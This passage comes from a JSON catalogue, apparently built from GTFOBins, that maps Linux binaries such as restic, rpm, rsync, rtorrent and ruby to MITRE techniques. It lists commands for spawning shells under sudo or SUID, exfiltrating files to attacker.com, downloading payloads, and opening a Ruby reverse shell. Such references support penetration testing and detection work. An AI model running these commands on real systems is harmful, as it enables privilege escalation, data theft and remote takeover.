backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:shell:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:restic:upload:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"]},{"id":"gtfo:rev:file-read:0:sudo","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rev:file-read:0:suid","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rev:file-read:0:unprivileged","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rev/"]},{"id":"gtfo:rlogin:upload:0:sudo","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlogin:upload:0:suid","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlogin:upload:0:unprivileged","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlogin/"]},{"id":"gtfo:rlwrap:file-write:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:file-write:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:file-write:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the output file. This relies on the external `echo` command.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:suid","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rlwrap:shell:0:unprivileged","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rlwrap /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlwrap/"]},{"id":"gtfo:rpm:command:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"rpm -ivh x-1.0-1.noarch.rpm","description":"Generate the RPM package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho /path/to/command >x.sh\nfpm -n x -s dir -t rpm -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:inherit:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpm --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:0:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:sudo","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:suid","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpm:shell:1:unprivileged","toolId":"gtfo:rpm","toolName":"rpm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpm --pipe '/bin/sh 0<&1'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpm/"]},{"id":"gtfo:rpmdb:inherit:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:inherit:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:inherit:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmdb --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:sudo","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:suid","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmdb:shell:0:unprivileged","toolId":"gtfo:rpmdb","toolName":"rpmdb","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmdb --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmdb/"]},{"id":"gtfo:rpmquery:inherit:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:inherit:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:inherit:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmquery --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:sudo","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:suid","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmquery:shell:0:unprivileged","toolId":"gtfo:rpmquery","toolName":"rpmquery","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmquery --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmquery/"]},{"id":"gtfo:rpmverify:inherit:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:inherit:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:inherit:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"rpmverify --eval '%{lua:...}'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:sudo","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:suid","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rpmverify:shell:0:unprivileged","toolId":"gtfo:rpmverify","toolName":"rpmverify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rpmverify --eval '%(/bin/sh 1>&2)'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rpmverify/"]},{"id":"gtfo:rsync:shell:0:sudo","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsync:shell:0:suid","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -p -c \"/bin/sh -p 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsync:shell:0:unprivileged","toolId":"gtfo:rsync","toolName":"rsync","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rsync -e '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' x:x","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rsync/"]},{"id":"gtfo:rsyslogd:command:0:sudo","toolId":"gtfo:rsyslogd","toolName":"rsyslogd","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file <<EOF\nmodule(load=\"imuxsock\")\n:msg, contains, \"somerandomstring\" ^/path/to/command\nEOF\n\nrsyslogd -f /path/to/temp-file","description":"In order for this to work, one must be able to trigger one event containing the chosen string, e.g., `somerandomstring`. One possibility is to attempt to connect to the victim host via SSH, for example:\n\n```\nssh somerandomstring@victim.com\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rsyslogd/"]},{"id":"gtfo:rtorrent:shell:0:sudo","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:rtorrent:shell:0:suid","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-p,-c,\"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:rtorrent:shell:0:unprivileged","toolId":"gtfo:rtorrent","toolName":"rtorrent","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'execute = /bin/sh,-c,\"/bin/sh </dev/tty >/dev/tty 2>/dev/tty\"' >~/.rtorrent.rc\nrtorrent","description":"After the shell, exit with `Ctrl-Q`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rtorrent/"]},{"id":"gtfo:ruby:download:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:download:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"ruby -e 'require \"open-uri\"; download = URI.open(\"http://attacker.com/path/to/input-file\"); IO.copy_stream(download, \"/path/to/output-file\")'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-read:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-read:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ruby -e 'puts File.read(\"/path/to/input-file\")'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-write:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:file-write:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ruby -e 'File.open(\"/path/to/output-file\", \"w+\") { |f| f.write(\"DATA\") }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:library-load:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:library-load:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"ruby -e 'require \"fiddle\"; Fiddle.dlopen(\"/path/to/lib.so\")'","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:reverse-shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:reverse-shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"attacker.com\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:capabilities","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'Process::Sys.setuid(0); exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:shell:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ruby -e 'exec \"/bin/sh\"'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:upload:0:sudo","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:ruby:upload:0:unprivileged","toolId":"gtfo:ruby","toolName":"ruby","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"ruby -run -e httpd . -p 80","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ruby/"]},{"id":"gtfo:run-mailcap:inherit:0:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← 